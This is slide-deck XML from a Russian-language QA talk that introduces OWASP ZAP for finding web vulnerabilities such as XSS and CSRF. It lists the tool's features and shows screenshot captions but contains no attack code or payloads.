            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>QA Lead в </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="0097A7"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Evo.company</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>5 лет в тестировании</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>6 проектов </a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="64" name="Shape 64"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="775500" y="1480350"/>
            <a:ext cx="2158350" cy="1845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descr="2.JPG" id="246" name="Shape 246"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="247" name="Shape 247"/>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Поиск XSS -&gt;  OWASP ZAP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249" name="Shape 249"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3523225" y="1459275"/>
            <a:ext cx="5357400" cy="2820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ru" sz="2400"/>
              <a:t>OWASP ZAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>- это инструмент для тестирования на проникновения и нахождения уязвимостей в веб-</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>приложениях.</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="zap_logo.png" id="250" name="Shape 250"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="682700" y="1632375"/>
            <a:ext cx="2412250" cy="2412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descr="2.JPG" id="255" name="Shape 255"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="256" name="Shape 256"/>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Каковы плюсы  OWASP ZAP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258" name="Shape 258"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3722475" y="825850"/>
            <a:ext cx="5541900" cy="49020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ru" sz="2400"/>
              <a:t>Перехват прокси</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>Автоматизированный сканер</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>Fuzzing</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="2400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400"/>
              <a:t>Поддержка аутентификаций и сессий</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Мощный API на основе REST</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Поддержка большого количества скриптовых языков</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-381000" lvl="0" marL="457200" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="2400"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Активно развивается международной командой добровольцев</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="sh_hacker-in-hoodie1500px-1000x558.jpg" id="259" name="Shape 259"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="656550" y="1975625"/>
            <a:ext cx="3146500" cy="1868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1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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3" st="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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4" st="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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5" st="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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6" st="6"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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7" st="7"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2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8" st="8"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect filter="fade" transition="in">
                                      <p:cBhvr>
                                        <p:cTn dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="25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descr="Выделение_006.png" id="264" name="Shape 264"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="766325" y="974775"/>
            <a:ext cx="8131776" cy="3846426"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="265" name="Shape 265"/>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Работа с OWASP ZAP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266" name="Shape 266"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5069100" y="2334000"/>
            <a:ext cx="3598200" cy="159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67" name="Shape 267"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="4440675" y="2624575"/>
            <a:ext cx="875100" cy="717000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="268" name="Shape 268"/>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OWASP ZAP </a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="270" name="Shape 270"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602"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Сортировка ошибок OWASP ZAP</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Screenshot_3.jpg" id="276" name="Shape 276"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1458950" y="1009925"/>
            <a:ext cx="5805050" cy="4004875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="277" name="Shape 277"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="676825" y="3048508"/>
            <a:ext cx="1805400" cy="1799100"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="278" name="Shape 278"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="465050" y="2773467"/>
            <a:ext cx="675600" cy="28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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="279" name="Shape 279"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2967450" y="2210619"/>
            <a:ext cx="230700" cy="2568300"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="280" name="Shape 280"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827250" y="1902271"/>
            <a:ext cx="1046700" cy="28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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CSRF и тд</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="281" name="Shape 281"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3412375" y="4209246"/>
            <a:ext cx="4031700" cy="638400"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="28575">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd len="med" w="med" type="none"/>
            <a:tailEnd len="med" w="med" type="triangle"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="282" name="Shape 282"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7094450" y="3935063"/>
            <a:ext cx="1146300" cy="28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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ну такое</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="283" name="Shape 283"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="284" name="Shape 28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285" name="Shape 285"/>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OWASP ZAP </a:t>
            </a:r>
            <a:endParaRPr sz="3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descr="Выделение_006.png" id="291" name="Shape 291"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="859875" y="1012825"/>
            <a:ext cx="7999926" cy="3788224"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="Shape 292"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-9423749">
            <a:off x="1647986" y="1755912"/>
            <a:ext cx="2247727" cy="136737"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow">
            <a:avLst>
              <a:gd fmla="val 50000" name="adj1"/>
              <a:gd fmla="val 50000" name="adj2"/>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rgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="Shape 29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OWASP ZA</a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="Shape 295"/>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OWASP ZAP </a:t>
            </a:r>
            <a:endParaRPr sz="3000">
              <a:solidFill>
                <a:schemeClr val="lt1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="297" name="Shape 297"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602"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descr="2.JPG" id="302" name="Shape 302"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="303" name="Shape 303" title="OWASP ZAP">
            <a:hlinkClick r:id="rId4"/>
          </p:cNvPr>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1334199" y="71400"/>
            <a:ext cx="6716750" cy="5037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309" name="Shape 309"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="0"/>
            <a:ext cx="454602" cy="5143499"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="Shape 310"/>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Shape 31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1473921124injection-attack.jpg" id="312" name="Shape 312"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="1120225"/>
            <a:ext cx="4889025" cy="2356500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="Screenshot_9.jpg" id="313" name="Shape 313"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4551900" y="1747899"/>
            <a:ext cx="4411475" cy="329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descr="9585885-happy-office-worker.jpg" id="318" name="Shape 318"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1270925" y="1441925"/>
            <a:ext cx="1056375" cy="1123100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="319" name="Shape 319"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609975" y="1018625"/>
            <a:ext cx="2772300" cy="42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http://web/?id= 6329&amp;print=Y</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr descr="2.JPG" id="320" name="Shape 320"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
